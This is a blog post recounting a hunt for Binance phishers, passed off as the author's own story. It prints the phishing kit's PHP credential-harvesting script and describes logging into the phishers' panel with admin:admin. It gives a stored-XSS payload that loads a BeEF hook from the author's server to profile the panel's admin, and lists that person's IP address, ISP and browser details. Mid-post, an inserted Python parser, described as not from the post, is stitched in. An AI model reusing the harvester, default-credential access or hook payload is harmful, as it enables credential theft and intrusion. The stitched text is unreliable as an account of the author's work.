The Time I tried to get a Bounty from Binance

Back in 2018 Binance had been targeted by a large scale attack by a group of phishers. They made a bounty offer of $250k in BNB to anyone who could provide information leading to their arrest.

In the Medium post they provided a list of known phishing domains for people to investigate.

I went through the list to see which of the sites were still active:

Domain              IP
kykoin.com          178.208.83.9
bitxumb.com         178.208.83.9
vawesplatform.com   178.208.83.9
waivesplatform.com  178.208.83.9
bittreh.com         178.208.83.9
livcoin.net         178.208.83.15
livekoin.com        178.208.83.15
livekoin.net        178.208.83.15

I opened them up in my browser to see if there was anything interesting about how the phisher worked, and indeed there was! The form used for logging credentials sent them to a PHP script called rdy.php located at /admm/rdy.php. I did some googling and was able to find the source for the phishing script on a Russian hacking forum.

<?php
    // Credentials posted by the fake login form.
    $login = $_POST['username'];
    $password = $_POST['password'];
    // Both fields are joined into one line: "login;password".
    $email = $login.";".$password;

    // If either field is empty, show an alert (Russian: "Password or login not entered.")
    // and send the visitor back to the login page. Note there is no exit here,
    // so execution falls through and the empty record is still written below.
    if ($login == "" or $password == ""){
        print "<script type=\"text/javascript\">";
        print "alert('Пароль или логин не введен.')";
        print "</script>";
        print '<script>document.location.replace("index.html");</script>';
    }

    // Append the record to acc.txt, each entry wrapped in "\n\r".
    $file = fopen('acc.txt','a+');
    fwrite($file,"\n\r$email\n\r");
    fclose($file);

    // Finally bounce the victim to ya.ru so the failed "login" looks like a glitch.
    print '<script>document.location.replace("http://ya.ru");</script>';
?>

As you can see, the script saves the credentials to acc.txt, which was accessible on the sites. I visited kykoin.com/admm/ to see what was there and it showed a login panel. Naturally I did what anyone would do when presented with an admin panel and tried to log in with admin:admin. That worked. It was a very simple page that showed the contents of acc.txt. I noticed there was no sanitisation of the acc.txt inputs, so we could XSS that admin panel.
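To make the stored XSS concrete, here is an added Python example (not code from the post or from the phishing kit) that parses the acc.txt format the rdy.php script above produces and renders it two ways: once the way the post describes the panel behaving, with field values written straight into HTML, and once with each field escaped. The sample log contents, the helper names and the `<script>alert(1)</script>` marker are all constructed for illustration; the only thing taken from the page is the record layout (`login;password`, wrapped in `\n\r`).

```python
import html
import re
from typing import List, Tuple

# Constructed sample of the acc.txt format the kit writes:
#   fwrite($file, "\n\r$email\n\r")  with  $email = "$login;$password"
# None of these credentials are real.
SAMPLE_ACC_TXT = (
    "\n\rvictim1@example.com;hunter2\n\r"
    "\n\rnotrealuser<script>alert(1)</script>;randompass\n\r"
    "\n\r;\n\r"  # the kit's empty-field branch falls through and still logs ";"
)


def parse_acc_txt(raw: str) -> List[Tuple[str, str]]:
    """Split the kit's log into (login, password) pairs.

    Records are separated by runs of CR/LF; login and password are joined
    with ";". Only the first ";" is treated as the separator, since the kit
    gives no way to tell a ";" inside a password apart from the delimiter.
    """
    records = []
    for line in re.split(r"[\r\n]+", raw):
        if not line:
            continue
        login, _, password = line.partition(";")
        records.append((login, password))
    return records


def render_unsafe(records: List[Tuple[str, str]]) -> str:
    """Mirror of the behaviour described in the post: raw field values are
    interpolated into the HTML table, so a login that contains <script>
    executes in whoever views the panel (stored XSS)."""
    rows = "".join(f"<tr><td>{l}</td><td>{p}</td></tr>" for l, p in records)
    return f"<table>{rows}</table>"


def render_safe(records: List[Tuple[str, str]]) -> str:
    """Same view with every attacker-controlled field HTML-escaped first."""
    rows = "".join(
        f"<tr><td>{html.escape(l)}</td><td>{html.escape(p)}</td></tr>"
        for l, p in records
    )
    return f"<table>{rows}</table>"


def contains_active_script(rendered_html: str) -> bool:
    """Crude check: does a literal <script tag survive into the output?"""
    return "<script" in rendered_html.lower()


if __name__ == "__main__":
    recs = parse_acc_txt(SAMPLE_ACC_TXT)
    print(len(recs), "records parsed")
    print("unsafe view carries live <script>:", contains_active_script(render_unsafe(recs)))
    print("escaped view carries live <script>:", contains_active_script(render_safe(recs)))
```

The lesson generalises beyond phishing panels: any log viewer that displays values an untrusted party chose (usernames, user agents, referrers) needs output encoding at render time, because the data source cannot be trusted to have filtered anything.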

In order to get some info on who the admin of the panel was, I set up a BeEF hook by submitting my payload to the phishing login.

user: notrealuser<script>var commandModuleStr = '<script src="http://myserver.com:3000/hook.js" type="text/javascript"><\/script>';document.write(commandModuleStr);</script> 
pass: randompass

I repeated this for the other phishing sites. Now all we had to do was wait for them to log in.

The next day the same person logged into 3 of the sites.

  • waivesplatform.com on 21/03/2018 at 13:51 (GMT +5)
  • bittreh.com on 21/03/2018 at 14:05 (GMT +5)
  • kykoin.com on 21/03/2018 at 18:12 (GMT +5)

From the BeEF hook we were only able to gather some info as browser exploits are not what they used to be :(

  • IP: 83.149.19.150
  • ISP: AS31133 PJSC MegaFon / OJSC MSS-Povolzhe Network
  • Date: Wed Mar 21 2018 13:51:17 GMT+0500 (RTZ 4 (зима))
  • Browser UA (User-agent) String: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 YaBrowser/17.11.1.990 Yowser/2.5 Safari/537.36
  • Browser Plugins: BookReader,Chromium PDF Plugin,Chromium PDF Viewer,Native Client,Shockwave Flash,Widevine Content Decryption Module

At this point there wasn’t much more I could do, so I sent an email to Binance with all the information I had gathered. Unfortunately Binance never responded, so I had no choice but to stop the pursuit. I personally do not believe that Binance had any intention of paying out in this case. In my opinion it appears to have been an attempt at controlling the negativity surrounding the situation. As a result of this I will be hesitant to participate in similar bounties from Binance in the future.

UPDATE September 2021: It appears that some people did receive bounties from this program as I discovered from this twitter exchange I had with @MrGlaive